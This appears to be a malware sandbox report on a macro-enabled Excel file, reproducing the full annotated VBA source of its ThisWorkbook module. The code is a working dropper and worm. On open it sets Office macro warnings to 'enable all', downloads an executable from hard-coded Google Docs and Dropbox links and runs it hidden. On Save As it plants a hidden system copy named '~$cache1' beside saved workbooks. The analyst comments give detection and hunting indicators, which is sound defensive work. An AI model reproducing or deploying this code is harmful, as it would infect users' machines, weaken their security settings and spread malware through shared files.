Behavioral task
behavioral1
Sample
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2.xlsm
Resource
win10v2004-20240508-en
General
-
Target
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2
-
Size
92KB
-
MD5
0e34bd639b25c855aadf84f46b09203c
-
SHA1
167ede90f0c060417bdbf1389141bcc3c20a01b4
-
SHA256
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2
-
SHA512
cd26ab5739f76f0fef49654502bc8f804b66c3f6eb25fd945dcb71851164367895b70db81b2ff3bb5a08a489e076f98c5d2fb95950caa8c47633217420693ab0
-
SSDEEP
1536:CguZCa6S5khUIOwgKPbY+5l4znOSjhLzVubGa/M1NIpPkUlB7583fjncFYIIreFo:CgugapkhlOkMSlaPjpzVw/Ms8ULavLc8
Malware Config
Signatures
-
resource sample
Files
-
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2.xlsm office2007
ThisWorkbook
' Analyst annotation: VBA source of the ThisWorkbook module as shown in the
' sandbox report. The listing's gutter numbers and lost line breaks have been
' undone; every code token and string literal is unchanged.
' What the visible code does:
'   * sets the Office "VBAWarnings" policy value to 1 for Excel and Word,
'   * locates or downloads an executable and starts it with a hidden window,
'   * intercepts Save / Save As so the workbook is always written as a
'     macro-enabled .xlsm with every sheet except the last one hidden,
'   * on Save As, copies the executable next to the saved workbook as a
'     hidden+system file named "~$cache1".
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module-level state used to decide whether closing should prompt for a save.
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

' Auto-run entry point: executes when the workbook is opened with macros enabled.
Private Sub Workbook_Open()
    Dim i As Integer
    ' Make every sheet visible again (the save handler below hides all but the last).
    For i = 1 To ActiveWorkbook.Sheets.Count
        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i

    ' Security downgrade: VBAWarnings = 1 is the "enable all macros" setting, so
    ' later macro documents run without a prompt for this user. Written per-user
    ' (HKCU) for the running Office version, for both Excel and Word.
    ' Detection: an Office process writing ...\Security\VBAWarnings.
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

    ' Alerts are switched off here and never switched back on in this module.
    Application.DisplayAlerts = False
    SheetCount = Worksheets.Count

    ' Locate/download and launch the payload (see MPS).
    Call MPS

    ActiveWorkbook.Sheets(1).Select
    SheetsChanged = False
End Sub

' If no edit was tracked, mark the workbook as saved so closing it shows no
' "save changes?" prompt, even though Workbook_Open altered sheet visibility.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    If Not SheetsChanged Then
        ActiveWorkbook.Saved = True
    End If
End Sub

' The next three handlers only track whether the user changed the workbook.
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
    SheetsChanged = True
End Sub

Private Sub Workbook_NewSheet(ByVal Sh As Object)
    SheetsChanged = True
End Sub

Private Sub Workbook_SheetActivate(ByVal Sh As Object)
    ' A changed sheet count (sheet added or deleted) counts as a modification.
    If ActiveWorkbook.Sheets.Count <> SheetCount Then
        SheetsChanged = True
        SheetCount = ActiveWorkbook.Sheets.Count
    End If
End Sub

' Replaces Excel's own Save / Save As. Both branches cancel the built-in save,
' hide sheets 1..Count-1, write the file, then unhide everything, so the file
' on disk opens with only the last sheet visible.
' NOTE(review): the last sheet is presumably the lure shown while macros are
' disabled - its content is not visible in this listing; confirm in the sample.
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
    Dim i As Integer
    Dim AIndex As Integer
    Dim FName

    ' Remember the active sheet so it can be re-selected after the save.
    AIndex = ActiveWorkbook.ActiveSheet.Index

    If SaveAsUI = False Then
        ' Plain "Save".
        Cancel = True
        ' Events off so the Save call below does not re-enter this handler;
        ' screen updating off so the sheet hiding is not shown to the user.
        Application.EnableEvents = False
        Application.ScreenUpdating = False

        For i = 1 To ActiveWorkbook.Sheets.Count - 1
            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
        Next i
        ActiveWorkbook.Save

        For i = 1 To ActiveWorkbook.Sheets.Count
            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
        Next i
        ActiveWorkbook.Sheets(AIndex).Select
        SheetsChanged = False

        Application.ScreenUpdating = True
        Application.EnableEvents = True
    Else
        ' "Save As".
        Cancel = True
        Application.EnableEvents = False
        Application.ScreenUpdating = False

        For i = 1 To ActiveWorkbook.Sheets.Count - 1
            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
        Next i

        ' The dialog offers *.xlsm only and SaveAs forces the macro-enabled
        ' format, so the macro travels with every copy the user saves.
        ' NOTE(review): the filter caption looks like Turkish text decoded with
        ' a Western code page - confirm against the raw vbaProject stream.
        FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")
        If FName <> False Then
            ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
            ' Drop a copy of the executable into the folder just saved to.
            SaveAsInj ActiveWorkbook.Path
        End If

        For i = 1 To ActiveWorkbook.Sheets.Count
            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
        Next i
        ActiveWorkbook.Sheets(AIndex).Select
        SheetsChanged = False

        Application.ScreenUpdating = True
        Application.EnableEvents = True
    End If
End Sub

' Copies %ALLUSERSPROFILE%\Synaptics\Synaptics.exe into DIR as "~$cache1"
' (only if that name is not already present) and marks it hidden + system.
' Does nothing when the source executable does not exist.
' Hunting: a hidden/system file named "~$cache1" beside .xlsm files, e.g. on
' shared folders or removable media.
Sub SaveAsInj(DIR As String)
    Dim FSO As Object
    Dim FN As String

    Set FSO = CreateObject("scripting.filesystemobject")
    FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"

    If FSO.FileExists(FN) Then
        If Not FSO.FileExists(DIR & "\~$cache1") Then
            FileCopy FN, DIR & "\~$cache1"
        End If
        ' Attributes are (re)applied whether or not the copy just happened.
        SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
    End If
End Sub

' Reads a registry value through WScript.Shell; errors are suppressed, so a
' missing key yields the function's default (empty string).
' Not called anywhere in the visible module.
Function RegKeyRead(i_RegKey As String) As String
    Dim myWS As Object

    On Error Resume Next
    Set myWS = CreateObject("WScript.Shell")
    RegKeyRead = myWS.RegRead(i_RegKey)
End Function

' Returns True when the registry value can be read, False when RegRead raises.
' Not called anywhere in the visible module.
Function RegKeyExists(i_RegKey As String) As Boolean
    Dim myWS As Object

    On Error GoTo ErrorHandler
    Set myWS = CreateObject("WScript.Shell")
    myWS.RegRead i_RegKey
    RegKeyExists = True
    Exit Function

ErrorHandler:
    RegKeyExists = False
End Function

' Writes a registry value through WScript.Shell.RegWrite (type defaults to
' REG_SZ). Workbook_Open uses it for the VBAWarnings writes. No error handling:
' a failed write raises in the caller.
Sub RegKeySave(i_RegKey As String, _
i_Value As String, _
Optional i_Type As String = "REG_SZ")
    Dim myWS As Object

    Set myWS = CreateObject("WScript.Shell")
    myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

' Finds an executable and runs it with a hidden window (vbHide). Order tried:
'   1. <workbook folder>\~$cache1      -> copied to %TEMP%\~$cache1.exe, run
'   2. <workbook folder>\Synaptics.exe -> copied to %TEMP%\~$cache1.exe, run
'   3. %ALLUSERSPROFILE%\Synaptics\Synaptics.exe       -> run in place
'   4. %WINDIR%\System32\Synaptics\Synaptics.exe       -> run in place
'   5. %TEMP%\~$cache1.exe missing -> download from URL(1..3), run if written
'   6. %TEMP%\~$cache1.exe already present -> run it
' Detection: EXCEL.EXE spawning %TEMP%\~$cache1.exe or ...\Synaptics\Synaptics.exe,
' and EXCEL.EXE making the HTTPS requests below.
Sub MPS()
    Dim FSO As Object
    ' Only URL is typed As String here; FP and TMP are Variants.
    ' FP(3) is declared but never assigned.
    Dim FP(1 To 3), TMP, URL(1 To 3) As String

    Set FSO = CreateObject("scripting.filesystemobject")
    FP(1) = ActiveWorkbook.Path & "\~$cache1"
    FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

    ' Download locations (network IoCs). URL(2) and URL(3) are identical.
    URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
    URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    TMP = Environ("Temp") & "\~$cache1.exe"

    If FSO.FileExists(FP(1)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(1), TMP
        End If
        Shell TMP, vbHide
    ElseIf FSO.FileExists(FP(2)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(2), TMP
        End If
        Shell TMP, vbHide
    Else
        If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
            Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
        ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
            Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
        ElseIf Not FSO.FileExists(TMP) Then
            ' The empty If/ElseIf bodies are deliberate: each FDW call runs only
            ' if the previous one returned False, i.e. stop at the first success.
            If FDW((URL(1)), (TMP)) Then
            ElseIf FDW((URL(2)), (TMP)) Then
            ElseIf FDW((URL(3)), (TMP)) Then
            End If
            If FSO.FileExists(TMP) Then
                Shell TMP, vbHide
            End If
        Else
            Shell TMP, vbHide
        End If

    End If

End Sub

' Downloads MYU with a synchronous WinHTTP GET and writes the response body to
' the path NMA. Returns True only for HTTP 200 whose text lacks the three
' error-page markers checked below; otherwise returns False and writes nothing.
' The downloaded content is not otherwise validated.
Function FDW(MYU, NMA As String) As Boolean
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    ' NOTE(review): with no On Error in effect a failed CreateObject raises
    ' rather than returning Nothing, so this fallback is probably never taken.
    If WinHttpReq Is Nothing Then
        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
    End If

    ' Option 0 is the User-Agent string: a fixed legacy IE7/Vista value, usable
    ' as a proxy-log indicator when it comes from a modern host.
    WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    ' Option 6 is the redirect switch. AllowRedirects is not declared in the
    ' visible code. NOTE(review): without Option Explicit it would be an Empty
    ' Variant, not True - confirm against the full project.
    WinHttpReq.Option(6) = AllowRedirects
    WinHttpReq.Open "GET", MYU, False
    WinHttpReq.Send

    If (WinHttpReq.Status = 200) Then
        ' Reject hosting-provider error pages that are served with status 200.
        If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
            FDW = True
            Set oStream = CreateObject("ADODB.Stream")
            oStream.Open
            ' Type 1 = binary stream, so the body is written byte-for-byte.
            oStream.Type = 1
            oStream.Write WinHttpReq.ResponseBody
            ' No overwrite option is passed; MPS calls this only when the
            ' target file does not exist yet.
            oStream.SaveToFile (NMA)
            oStream.Close
        Else
            FDW = False
        End If
    Else
        FDW = False
    End If
End Function